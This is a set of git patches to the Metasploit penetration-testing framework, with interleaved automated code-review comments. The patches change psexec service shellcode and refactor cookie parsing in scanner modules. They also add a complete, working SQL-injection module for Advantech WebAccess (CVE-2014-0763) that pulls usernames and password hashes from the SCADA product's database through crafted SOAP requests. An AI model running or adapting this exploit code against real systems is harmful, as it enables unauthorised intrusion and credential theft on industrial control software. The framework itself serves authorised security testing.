--- a/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm +++ b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm @@ -14,6 +14,7 @@ start: ; pop ebp ; pop off the address of 'api_call' for calling later. %include "./src/block/block_service.asm" +%include "./src/block/block_service_change_description.asm" %include "./src/block/block_create_remote_process.asm" %include "./src/block/block_service_stopped.asm" diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index ec12f16ef7..6526bfde06 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -539,6 +539,20 @@ require 'msf/core/exe/segment_injector' "\x00\x6A\x00\x6A\x00\x6A\x01\x6A\x10\x89\xE1\x6A\x00\x51\x50\x68" + "\xC6\x55\x37\x7D\xFF\xD5\x57\x68\xF0\xB5\xA2\x56\xFF\xD5" + code_service_description = "" + + if opts[:servicedescription] + pushed_service_description = string_to_pushes(opts[:servicedescription]) + + code_service_description = + "\x68\xFF\x01\x0F\x00\x6A\x00\x6A\x00\x68\x67\xF0\x36" + + "\x76\xFF\xD5\x89\xC7"+pushed_service_name+"\x89\xE1\x68" + + "\xFF\x01\x0F\x00\x51\x50\x68\x56\x28\x4B\x40\xFF\xD5\x89\xC6" + + pushed_service_description+"\x89\xE1\x6A\x01\x50\x68\x87\xB0\x35" + + "\xED\xFF\xD5\x56\x68\xDE\xEA\x77\xAD\xFF\xD5\x57\x68\xDE\xEA\x77" + + "\xAD\xFF\xD5" + end + precode_size = 0x42 shellcode_code_offset = code_service_stopped.length + precode_size @@ -561,7 +575,8 @@ require 'msf/core/exe/segment_injector' [hash_code_offset].pack(' Date: Mon, 6 Jan 2014 19:49:52 +0100 Subject: [PATCH 302/853] correct error in block service_change_description --- .../x86/src/block/block_service_change_description.asm | 6 +++++- lib/msf/util/exe.rb | 8 ++++---- 2 files changed, 9 insertions(+), 5 deletions(-) diff --git a/external/source/shellcode/windows/x86/src/block/block_service_change_description.asm b/external/source/shellcode/windows/x86/src/block/block_service_change_description.asm index 5f6b939222..cdd1ba61bc 100644 
--- a/external/source/shellcode/windows/x86/src/block/block_service_change_description.asm +++ b/external/source/shellcode/windows/x86/src/block/block_service_change_description.asm @@ -7,7 +7,7 @@ [BITS 32] ; Input: EBP must be the address of 'api_call'. -push 0x000F01FF +push 0x000F003F push 0x00000000 push 0x00000000 push 0x7636F067 @@ -24,7 +24,11 @@ call ebp ;OpenServiceA mov esi, eax push 0x00464349 push 0x56524553 +mov ecx, esp +push 0x00000000 +push ecx mov ecx, esp ;SVCDESCRIPTION +push ecx push 0x00000001 ;SERVICE_CONFIG_DESCRIPTION push eax push 0xED35B087 diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 6526bfde06..c03e02dc7f 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -545,12 +545,12 @@ require 'msf/core/exe/segment_injector' pushed_service_description = string_to_pushes(opts[:servicedescription]) code_service_description = - "\x68\xFF\x01\x0F\x00\x6A\x00\x6A\x00\x68\x67\xF0\x36" + + "\x68\x3F\x00\x0F\x00\x6A\x00\x6A\x00\x68\x67\xF0\x36" + "\x76\xFF\xD5\x89\xC7"+pushed_service_name+"\x89\xE1\x68" + "\xFF\x01\x0F\x00\x51\x50\x68\x56\x28\x4B\x40\xFF\xD5\x89\xC6" + - pushed_service_description+"\x89\xE1\x6A\x01\x50\x68\x87\xB0\x35" + - "\xED\xFF\xD5\x56\x68\xDE\xEA\x77\xAD\xFF\xD5\x57\x68\xDE\xEA\x77" + - "\xAD\xFF\xD5" + pushed_service_description+"\x89\xE1\x6A\x00\x51\x89\xE1\x51" + + "\x6A\x01\x50\x68\x87\xB0\x35\xED\xFF\xD5\x56\x68\xDE\xEA\x77" + + "\xAD\xFF\xD5\x57\x68\xDE\xEA\x77\xAD\xFF\xD5" end precode_size = 0x42 From 808f87d213de5f1881b908c21dc9a5fe4495af1a Mon Sep 17 00:00:00 2001 From: Florian Gaultier Date: Mon, 6 Jan 2014 22:00:18 +0100 Subject: [PATCH 303/853] SERVICE_DESCRIPTION doesn't concern this PR --- lib/msf/util/exe.rb | 17 +---------------- modules/exploits/windows/smb/psexec.rb | 8 +++++--- 2 files changed, 6 insertions(+), 19 deletions(-) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index c03e02dc7f..ec12f16ef7 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb 
@@ -539,20 +539,6 @@ require 'msf/core/exe/segment_injector' "\x00\x6A\x00\x6A\x00\x6A\x01\x6A\x10\x89\xE1\x6A\x00\x51\x50\x68" + "\xC6\x55\x37\x7D\xFF\xD5\x57\x68\xF0\xB5\xA2\x56\xFF\xD5" - code_service_description = "" - - if opts[:servicedescription] - pushed_service_description = string_to_pushes(opts[:servicedescription]) - - code_service_description = - "\x68\x3F\x00\x0F\x00\x6A\x00\x6A\x00\x68\x67\xF0\x36" + - "\x76\xFF\xD5\x89\xC7"+pushed_service_name+"\x89\xE1\x68" + - "\xFF\x01\x0F\x00\x51\x50\x68\x56\x28\x4B\x40\xFF\xD5\x89\xC6" + - pushed_service_description+"\x89\xE1\x6A\x00\x51\x89\xE1\x51" + - "\x6A\x01\x50\x68\x87\xB0\x35\xED\xFF\xD5\x56\x68\xDE\xEA\x77" + - "\xAD\xFF\xD5\x57\x68\xDE\xEA\x77\xAD\xFF\xD5" - end - precode_size = 0x42 shellcode_code_offset = code_service_stopped.length + precode_size @@ -575,8 +561,7 @@ require 'msf/core/exe/segment_injector' [hash_code_offset].pack(' servicename } + if (datastore['PAYLOAD'].include? 'x64') + opts.merge!({ :arch => ARCH_X64 }) + end exe = generate_payload_exe_service(opts) fd << exe From 87be2e674a48fabe47ba47ecde80958b06de9324 Mon Sep 17 00:00:00 2001 From: agix Date: Wed, 26 Mar 2014 19:13:54 +0100 Subject: [PATCH 304/853] Rebase on https://github.com/rapid7/metasploit-framework/pull/2831 and adapt to the new mixin --- lib/msf/core/exploit/smb/psexec.rb | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/exploit/smb/psexec.rb b/lib/msf/core/exploit/smb/psexec.rb index d3a6ccf13c..71a4b4cbf4 100644 --- a/lib/msf/core/exploit/smb/psexec.rb +++ b/lib/msf/core/exploit/smb/psexec.rb 
@@ -52,7 +52,7 @@ module Exploit::Remote::SMB::Psexec
 # @param command [String] Should be a valid windows command
 # @param disconnect [Boolean] Disconnect afterwards
 # @return [Boolean] Whether everything went well
- def psexec(command, disconnect=true, service_description=nil)
+ def psexec(command, disconnect=true, service_description=nil, service_name=nil, display_name=nil)
 simple.connect("\\\\#{datastore['RHOST']}\\IPC$")
 handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"])
 vprint_status("#{peer} - Binding to #{handle} ...")
@@ -70,8 +70,9 @@ module Exploit::Remote::SMB::Psexec
 print_error("#{peer} - Error getting scm handle: #{e}")
 return false
 end
- servicename = Rex::Text.rand_text_alpha(11)
- displayname = Rex::Text.rand_text_alpha(16)
+ servicename = service_name || Rex::Text.rand_text_alpha(11)
+ displayname = display_name || Rex::Text.rand_text_alpha(16)
+ servicedescription = service_description || Rex::Text.rand_text_alpha(rand(32)+1)
 svc_handle = nil
 svc_status = nil
From d3f2414d09b25b7802cf5669f66b48e0ba1d6f54 Mon Sep 17 00:00:00 2001
From: agix
Date: Wed, 26 Mar 2014 20:00:29 +0100
Subject: [PATCH 305/853] Fix merging typo
---
 modules/exploits/windows/smb/psexec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb
index ec04e4b984..0ce4260aff 100644
--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
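Review bot: The three YARD lines shown above `psexec` document only `command`, `disconnect` and the return value, while the signature now also takes `service_name` and `display_name`, and `service_description` is not mentioned in the visible lines either. I would add `# @param service_name [String, nil] Service name to register, random when nil`, a matching `# @param display_name [String, nil] ...` line, and one for `service_description`. Five positional arguments with `nil` defaults are also easy to pass in the wrong order, so keyword arguments would read more clearly if the callers can be updated. The method body continues outside the hunk.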
@@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
 OptBool.new('MOF_UPLOAD_METHOD', [true, "Use WBEM instead of RPC, ADMIN$ share will be mandatory. ( Not compatible with Vista+ )", false]),
 OptBool.new('ALLOW_GUEST', [true, "Keep trying if only given guest access", false]),
 OptString.new('SERVICE_FILENAME', [false, "Filename to to be used on target for the service binary",nil]),
- OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil])
+ OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil]),
 OptString.new('SERVICE_NAME', [false, "Servicename to to be used on target for the service binary and manager",nil]),
 OptString.new('SERVICE_DISPLAYNAME', [false, "Service displayname to to be used on target for the service manager",nil])
 ], self.class)
From 1a3b31926285cb0d219d6f3cd28a937e80579e67 Mon Sep 17 00:00:00 2001
From: agix
Date: Wed, 2 Apr 2014 10:20:56 +0200
Subject: [PATCH 306/853] rebase to use the mixin psexec
---
 lib/msf/core/exploit/smb/psexec.rb | 1 -
 modules/exploits/windows/smb/psexec.rb | 7 ++-----
 2 files changed, 2 insertions(+), 6 deletions(-)
diff --git a/lib/msf/core/exploit/smb/psexec.rb b/lib/msf/core/exploit/smb/psexec.rb
index 71a4b4cbf4..471310a12e 100644
--- a/lib/msf/core/exploit/smb/psexec.rb
+++ b/lib/msf/core/exploit/smb/psexec.rb
@@ -72,7 +72,6 @@ module Exploit::Remote::SMB::Psexec
 end
 servicename = service_name || Rex::Text.rand_text_alpha(11)
 displayname = display_name || Rex::Text.rand_text_alpha(16)
- servicedescription = service_description || Rex::Text.rand_text_alpha(rand(32)+1)
 svc_handle = nil
 svc_status = nil
diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb
index 0ce4260aff..03027e943d 100644
--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@@ -155,7 +155,7 @@ class Metasploit3 < Msf::Exploit::Remote
 simple.disconnect("ADMIN$")
 else
 servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8)
- servicedescription = datastore['SERVICE_DESCRIPTION'] || rand_text_alpha(rand(32)+1)
+ servicedescription = datastore['SERVICE_DESCRIPTION']
 displayname = datastore['SERVICE_DISPLAYNAME'] || 'M' + rand_text_alpha(rand(32)+1)
 # Upload the shellcode to a file
@@ -179,9 +179,6 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 exe = ''
 opts = { :servicename => servicename }
- if (datastore['PAYLOAD'].include? 'x64')
- opts.merge!({ :arch => ARCH_X64 })
- end
 exe = generate_payload_exe_service(opts)
 fd << exe
@@ -205,7 +202,7 @@ class Metasploit3 < Msf::Exploit::Remote
 file_location = "\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#{filename}"
 end
- psexec(file_location, false, servicedescription)
+ psexec(file_location, false, servicedescription, servicename, displayname)
 print_status("Deleting \\#{filename}...")
 sleep(1)
From a7075c7e082fc860305221e20068da90e79f6fbc Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Tue, 13 May 2014 14:17:59 -0500
Subject: [PATCH 307/853] Add module for ZDI-14-077
---
 .../advantech_webaccess_dbvisitor_sqli.rb | 182 ++++++++++++++++++
 1 file changed, 182 insertions(+)
 create mode 100644 modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb
diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb
new file mode 100644
index 0000000000..1d6617fd25
--- /dev/null
+++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb
@@ -0,0 +1,182 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rexml/document' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include REXML + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Advantech WebAccess SQL Injection', + 'Description' => %q{ + This module exploits a SQL injection vulnerability found in Advantech WebAccess 7.1. The + vulnerability exists in the DBVisitor.dll component, and can be abused through malicious + requests to the ChartThemeConfig web service. This module can be used to extract the BEMS + site usernames and hashes. + }, + 'References' => + [ + [ 'CVE', '2014-0763' ], + [ 'ZDI', '14-077' ], + [ 'OSVDB', '105572' ], + [ 'BID', '66740' ], + [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-14-079-03' ] + ], + 'Author' => + [ + 'rgod ', # Vulnerability Discovery + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'DisclosureDate' => "Apr 08 2014" + )) + + register_options( + [ + OptString.new("TARGETURI", [true, 'The path to the BEMS Web Site', '/BEMS']) + ], self.class) + end + + def build_soap(injection) + xml = Document.new + xml.add_element( + "s:Envelope", + { + 'xmlns:s' => "http://schemas.xmlsoap.org/soap/envelope/" + }) + xml.root.add_element("s:Body") + body = xml.root.elements[1] + body.add_element( + "GetThemeNameList", + { + 'xmlns' => "http://tempuri.org/" + }) + name_list = body.elements[1] + name_list.add_element("userName") + name_list.elements['userName'].text = injection + + xml.to_s + end + + def do_sqli(injection, mark) + xml = build_soap(injection) + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path.to_s, "Services", "ChartThemeConfig.svc"), + 'ctype' => 'text/xml; charset=UTF-8', + 'headers' => { + 'SOAPAction' => 
'"http://tempuri.org/IChartThemeConfig/GetThemeNameList"' + }, + 'data' => xml + }) + + unless res and res.code == 200 and res.body.to_s =~ /#{mark}/ + return nil + end + + res.body.to_s + end + + def check + mark = Rex::Text.rand_text_alpha(8 + rand(5)) + injection = "#{Rex::Text.rand_text_alpha(8 + rand(5))}' " + injection << "union all select '#{mark}' from BAThemeSetting where '#{Rex::Text.rand_text_alpha(2)}'='#{Rex::Text.rand_text_alpha(3)}" + data = do_sqli(injection, mark) + + if data.nil? + return Msf::Exploit::CheckCode::Safe + end + + Msf::Exploit::CheckCode::Vulnerable + end + + def parse_users(xml, mark) + doc = Document.new(xml) + + strings = XPath.match(doc, "s:Envelope/s:Body/GetThemeNameListResponse/GetThemeNameListResult/a:string") + strings_length = strings.length + + unless strings_length > 1 + return + end + + i = 0 + strings.each do |result| + next if result.text == mark + if i < (strings_length / 3) + @users.push(result.text) + elsif i < (strings_length / 3) * 2 + @passwords.push(result.text) + else + @passwords2.push(result.text) + end + i = i + 1 + end + + end + + def run + print_status("#{peer} - Exploiting sqli to extract users information...") + mark = Rex::Text.rand_text_alpha(8 + rand(5)) + # While installing I can only configure an Access backend, but + # according to documentation other backends are supported. This + # injection should be compatible, hopefully, with most backends. + injection = "#{Rex::Text.rand_text_alpha(8 + rand(5))}' " + injection << "union all select UserName from BAUser where 1=1 " + injection << "union all select Password from BAUser where 1=1 " + injection << "union all select Password2 from BAUser where 1=1 " + injection << "union all select '#{mark}' from BAThemeSetting where '#{Rex::Text.rand_text_alpha(2)}'='#{Rex::Text.rand_text_alpha(3)}" + data = do_sqli(injection, mark) + + if data.blank? 
+ print_error("#{peer} - Error exploiting sqli") + return + end + + @users = [] + @passwords = [] + @passwords2 = [] + + print_status("#{peer} - Parsing extracted data...") + parse_users(data, mark) + + if @users.empty? + print_error("#{peer} - Users not found") + else + print_good("#{peer} - #{@users.length} users found!") + end + + users_table = Rex::Ui::Text::Table.new( + 'Header' => 'vBulletin Users', + 'Ident' => 1, + 'Columns' => ['Username', 'Password Hash', 'Password Hash 2'] + ) + + for i in 0..@users.length - 1 + report_auth_info({ + :host => rhost, + :port => rport, + :user => @users[i], + :pass => "#{@passwords[i]}:#{@passwords2[i]}", + :type => "hash", + :sname => (ssl ? "https" : "http"), + :proof => data # Using proof to store the hash salt + }) + users_table << [@users[i], @passwords[i], @passwords2[i]] + end + + print_line(users_table.to_s) + + end + + +end + From df4b832019d88c3ab4ac8209fe5072f56df03ad0 Mon Sep 17 00:00:00 2001 
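Review bot: The results table built in `run` is titled `'Header' => 'vBulletin Users'`, which looks like a leftover from another module and will mislabel the output and any saved report; something like `'Header' => 'Advantech WebAccess Users'` matches what the module collects. The neighbouring key `'Ident' => 1` is probably a misspelling of the table option `'Indent'`. Separately, `:proof => data` stores the whole SOAP response, which holds every extracted username and hash, in each credential record, while its comment says it holds a salt. Keeping only the values that belong to the record would avoid duplicating sensitive data across the database.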
From: Christian Mehlmauer
Date: Tue, 13 May 2014 22:56:12 +0200
Subject: [PATCH 308/853] Resolved some more Set-Cookie warnings
---
 modules/auxiliary/scanner/http/dolibarr_login.rb | 4 ++--
 modules/auxiliary/scanner/http/glassfish_login.rb | 4 ++--
 modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb | 6 +++---
 modules/auxiliary/scanner/http/owa_login.rb | 7 ++++---
 modules/auxiliary/scanner/http/sentry_cdu_enum.rb | 2 +-
 modules/auxiliary/scanner/http/sevone_enum.rb | 2 +-
 .../scanner/http/smt_ipmi_url_redirect_traversal.rb | 2 +-
 modules/auxiliary/scanner/http/splunk_web_login.rb | 4 ++--
 .../auxiliary/scanner/http/symantec_brightmail_logfile.rb | 6 +++---
 modules/auxiliary/scanner/http/tomcat_enum.rb | 2 +-
 modules/auxiliary/scanner/http/vcms_login.rb | 2 +-
 modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb | 6 +++---
 modules/auxiliary/scanner/lotus/lotus_domino_login.rb | 4 ++--
 modules/auxiliary/scanner/msf/msf_web_login.rb | 4 ++--
 .../auxiliary/scanner/vmware/vmware_screenshot_stealer.rb | 4 ++--
 modules/exploits/linux/http/dolibarr_cmd_exec.rb | 4 ++--
 .../linux/http/foreman_openstack_satellite_code_exec.rb | 2 +-
 modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb | 2 +-
 modules/exploits/linux/http/mutiny_frontend_upload.rb | 4 ++--
 modules/exploits/linux/http/pineapp_test_li_conn_exec.rb | 2 +-
 modules/exploits/multi/http/activecollab_chat.rb | 2 +-
 modules/exploits/multi/http/axis2_deployer.rb | 4 ++--
 modules/exploits/multi/http/glassfish_deployer.rb | 6 +++---
 modules/exploits/multi/http/glossword_upload_exec.rb | 4 ++--
 .../exploits/multi/http/hp_sitescope_uploadfileshandler.rb | 4 ++--
 modules/exploits/multi/http/hp_sys_mgmt_exec.rb | 2 +-
 modules/exploits/multi/http/jenkins_script_console.rb | 2 +-
 modules/exploits/multi/http/mutiny_subnetmask_exec.rb | 2 +-
 modules/exploits/multi/http/php_volunteer_upload_exec.rb | 2 +-
 modules/exploits/multi/http/phpldapadmin_query_engine.rb | 4 ++--
 modules/exploits/multi/http/qdpm_upload_exec.rb | 2 +-
 .../exploits/multi/http/rails_secret_deserialization.rb | 4 ++--
 modules/exploits/multi/http/sflog_upload_exec.rb | 4 ++--
 modules/exploits/multi/http/sit_file_upload.rb | 2 +-
 modules/exploits/multi/http/splunk_mappy_exec.rb | 6 +++---
 modules/exploits/multi/http/splunk_upload_app_exec.rb | 4 ++--
 36 files changed, 64 insertions(+), 63 deletions(-)
diff --git a/modules/auxiliary/scanner/http/dolibarr_login.rb b/modules/auxiliary/scanner/http/dolibarr_login.rb
index 6463d9af62..58ab1e19d5 100644
--- a/modules/auxiliary/scanner/http/dolibarr_login.rb
+++ b/modules/auxiliary/scanner/http/dolibarr_login.rb
@@ -42,10 +42,10 @@ class Metasploit3 < Msf::Auxiliary
 'uri' => normalize_uri(@uri.path)
 })
- return [nil, nil] if not (res and res.headers['Set-Cookie'])
+ return [nil, nil] if res.nil? || res.get_cookies.empty?
 # Get the session ID from the cookie
- m = res.headers['Set-Cookie'].match(/(DOLSESSID_.+);/)
+ m = get_cookies.match(/(DOLSESSID_.+);/)
 id = (m.nil?) ? nil : m[1]
 # Get the token from the decompressed HTTP body response
diff --git a/modules/auxiliary/scanner/http/glassfish_login.rb b/modules/auxiliary/scanner/http/glassfish_login.rb
index aa2dab6a0b..7801400f3e 100644
--- a/modules/auxiliary/scanner/http/glassfish_login.rb
+++ b/modules/auxiliary/scanner/http/glassfish_login.rb
@@ -167,7 +167,7 @@ class Metasploit3 < Msf::Auxiliary
 print_status("Trying credential GlassFish 2.x #{user}:'#{pass}'....")
 res = try_login(user,pass)
 if res and res.code == 302
- session = $1 if (res and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*); /i)
+ session = $1 if res && res.get_cookies =~ /JSESSIONID=(.*); /i
 res = send_request('/applications/upload.jsf', 'GET', session)
 p = /Deploy Enterprise Applications\/Modules/
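Review bot: In the dolibarr_login.rb hunk the new line `m = get_cookies.match(/(DOLSESSID_.+);/)` has lost its receiver, so it calls `get_cookies` on the module instead of on the response and will most likely raise NameError once the guard above it passes. It should read `m = res.get_cookies.match(/(DOLSESSID_.+);/)`, which is what the matching change in modules/exploits/linux/http/dolibarr_cmd_exec.rb later in this commit does. The enclosing method starts and ends outside the hunk.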
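Review bot: The pattern `/JSESSIONID=(.*); /i` in the GlassFish 2.x branch still expects a semicolon followed by a space after the value, which held for a raw Set-Cookie header with attributes but may not hold for the string `get_cookies` returns. `get_cookies` is defined outside this diff; if it returns a trimmed list of `name=value;` pairs, a JSESSIONID that is the last or only cookie no longer matches, and with several cookies the greedy `(.*)` captures past the session id. `session = $1 if res && res.get_cookies =~ /JSESSIONID=([^;]+)/i` avoids both, and the same applies to the GlassFish 3.x hunk at `@@ -180,7 +180,7 @@`.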
@@ -180,7 +180,7 @@ class Metasploit3 < Msf::Auxiliary
 print_status("Trying credential GlassFish 3.x #{user}:'#{pass}'....")
 res = try_login(user,pass)
 if res and res.code == 302
- session = $1 if (res and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*); /i)
+ session = $1 if res && res.get_cookies =~ /JSESSIONID=(.*); /i
 res = send_request('/common/applications/uploadFrame.jsf', 'GET', session)
 p = /<title>Deploy Applications or Modules/
diff --git a/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb b/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb
index a55c173a17..62fe258b46 100644
--- a/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb
+++ b/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb
@@ -64,7 +64,7 @@ class Metasploit4 < Msf::Auxiliary
 }
 })
- if res and res.code == 200 and res.headers['Set-Cookie'] and res.headers['Set-Cookie'] =~ /([^\s]*session)=([a-z0-9]+)/
+ if res && res.code == 200 && res.get_cookies =~ /([^\s]*session)=([a-z0-9]+)/
 return $1,$2
 else
 return nil
@@ -134,8 +134,8 @@ class Metasploit4 < Msf::Auxiliary
 'cookie' => session_cookie
 })
- if res and res.code == 302 and res.headers['Set-Cookie'] =~ /UserID=/
- parse_auth_cookie(res.headers['Set-Cookie'])
+ if res and res.code == 302 and res.get_cookies.include?('UserID=')
+ parse_auth_cookie(res.get_cookies)
 return true
 else
 return false
diff --git a/modules/auxiliary/scanner/http/owa_login.rb b/modules/auxiliary/scanner/http/owa_login.rb
index 8240a0ae11..9696f28e3f 100644
--- a/modules/auxiliary/scanner/http/owa_login.rb
+++ b/modules/auxiliary/scanner/http/owa_login.rb
@@ -200,7 +200,7 @@ class Metasploit3 < Msf::Auxiliary
 return :abort
 end
- if action.name != "OWA_2013" and not res.headers['set-cookie']
+ if action.name != "OWA_2013" and res.get_cookies.empty?
 print_error("#{msg} Received invalid repsonse due to a missing cookie (possibly due to invalid version), aborting")
 return :abort
 end
@@ -233,8 +233,9 @@ class Metasploit3 < Msf::Auxiliary
 end
 else
 # these two lines are the authentication info
- sessionid = 'sessionid=' << res.headers['set-cookie'].split('sessionid=')[1].split('; ')[0]
- cadata = 'cadata=' << res.headers['set-cookie'].split('cadata=')[1].split('; ')[0]
+ cookies = res.get_cookies
+ sessionid = 'sessionid=' << cookies.split('sessionid=')[1].split('; ')[0]
+ cadata = 'cadata=' << cookies.split('cadata=')[1].split('; ')[0]
 headers['Cookie'] = 'PBack=0; ' << sessionid << '; ' << cadata
 end
diff --git a/modules/auxiliary/scanner/http/sentry_cdu_enum.rb b/modules/auxiliary/scanner/http/sentry_cdu_enum.rb
index 6c00a86bfc..71de9699d7 100644
--- a/modules/auxiliary/scanner/http/sentry_cdu_enum.rb
+++ b/modules/auxiliary/scanner/http/sentry_cdu_enum.rb
@@ -82,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary
 'authorization' => basic_auth(user,pass)
 })
- if (res and res.headers['Set-Cookie'])
+ if res and !res.get_cookies.empty?
 print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
 report_hash = {
diff --git a/modules/auxiliary/scanner/http/sevone_enum.rb b/modules/auxiliary/scanner/http/sevone_enum.rb
index df1365d803..1714e690c9 100644
--- a/modules/auxiliary/scanner/http/sevone_enum.rb
+++ b/modules/auxiliary/scanner/http/sevone_enum.rb
@@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
 'method' => 'GET'
 })
- if (res and res.code.to_i == 200 and res.headers['Set-Cookie'].include?('SEVONE'))
+ if (res and res.code.to_i == 200 and res.get_cookies.include?('SEVONE'))
 version_key = /Version: <strong>(.+)<\/strong>/
 version = res.body.scan(version_key).flatten
 print_good("#{rhost}:#{rport} - Application confirmed to be SevOne Network Performance Management System version #{version}")
diff --git a/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb b/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb
index 918a44ed28..491fb9ff34 100644
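Review bot: In the owa_login.rb hunk at `@@ -233,8 +233,9 @@`, `cookies.split('sessionid=')[1].split('; ')[0]` and the `cadata` line below it raise NoMethodError when the response carries cookies but not these two, because `[1]` is then nil. The guard added in the earlier hunk only checks `res.get_cookies.empty?`, and only for actions other than OWA_2013. Extracting with `sessionid = cookies[/sessionid=[^;]+/]` (and the same for `cadata`) and returning `:abort` when either is nil would turn a scanner crash into a handled failure. The surrounding method is not fully visible in the hunk.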
--- a/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary } }) - if res and res.code == 200 and res.body.to_s =~ /self.location="\.\.\/cgi\/url_redirect\.cgi/ and res.headers["Set-Cookie"].to_s =~ /(SID=[a-z]+)/ + if res and res.code == 200 and res.body.to_s =~ /self.location="\.\.\/cgi\/url_redirect\.cgi/ and res.get_cookies =~ /(SID=[a-z]+)/ return $1 else return nil diff --git a/modules/auxiliary/scanner/http/splunk_web_login.rb b/modules/auxiliary/scanner/http/splunk_web_login.rb index 02407661c3..1c47c9e90b 100644 --- a/modules/auxiliary/scanner/http/splunk_web_login.rb +++ b/modules/auxiliary/scanner/http/splunk_web_login.rb @@ -82,8 +82,8 @@ class Metasploit3 < Msf::Auxiliary session_id = '' cval = '' - if res and res.code == 200 and res.headers['Set-Cookie'] - res.headers['Set-Cookie'].split(';').each {|c| + if res and res.code == 200 and !res.get_cookies.empty? + res.get_cookies.split(';').each {|c| c.split(',').each {|v| if v.split('=')[0] =~ /cval/ cval = v.split('=')[1] diff --git a/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb b/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb index 7a5057147e..d3cd471a5e 100644 --- a/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb +++ b/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb @@ -86,8 +86,8 @@ class Metasploit3 < Msf::Auxiliary last_login = '' #A hidden field in the login page res = send_request_raw({'uri'=>'/brightmail/viewLogin.do'}) - if res and res.headers['Set-Cookie'] - sid = res.headers['Set-Cookie'].scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0] || '' + if res and !res.get_cookies.empty? + sid = res.get_cookies.scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0] || '' end if res @@ -147,4 +147,4 @@ class Metasploit3 < Msf::Auxiliary download_file(sid, fname) end -end \ No newline at end of file +end 
diff --git a/modules/auxiliary/scanner/http/tomcat_enum.rb b/modules/auxiliary/scanner/http/tomcat_enum.rb
index ab4d7484f9..e07eaecc52 100644
--- a/modules/auxiliary/scanner/http/tomcat_enum.rb
+++ b/modules/auxiliary/scanner/http/tomcat_enum.rb
@@ -102,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary
 'data' => post_data,
 }, 20)
- if res and res.code == 200 and res.headers['Set-Cookie']
+ if res and res.code == 200 and !res.get_cookies.empty?
 vprint_error("#{target_url} - Apache Tomcat #{user} not found ")
 elsif res and res.code == 200 and res.body =~ /invalid username/i
 vprint_error("#{target_url} - Apache Tomcat #{user} not found ")
diff --git a/modules/auxiliary/scanner/http/vcms_login.rb b/modules/auxiliary/scanner/http/vcms_login.rb
index 21610d3ab7..f8ecb4781e 100644
--- a/modules/auxiliary/scanner/http/vcms_login.rb
+++ b/modules/auxiliary/scanner/http/vcms_login.rb
@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Auxiliary
 })
 # Get the PHP session ID
- m = res.headers['Set-Cookie'].match(/(PHPSESSID=.+);/)
+ m = res.get_cookies.match(/(PHPSESSID=.+);/)
 id = (m.nil?) ? nil : m[1]
 return id
diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb
index 39c02bac5a..2816691fcd 100644
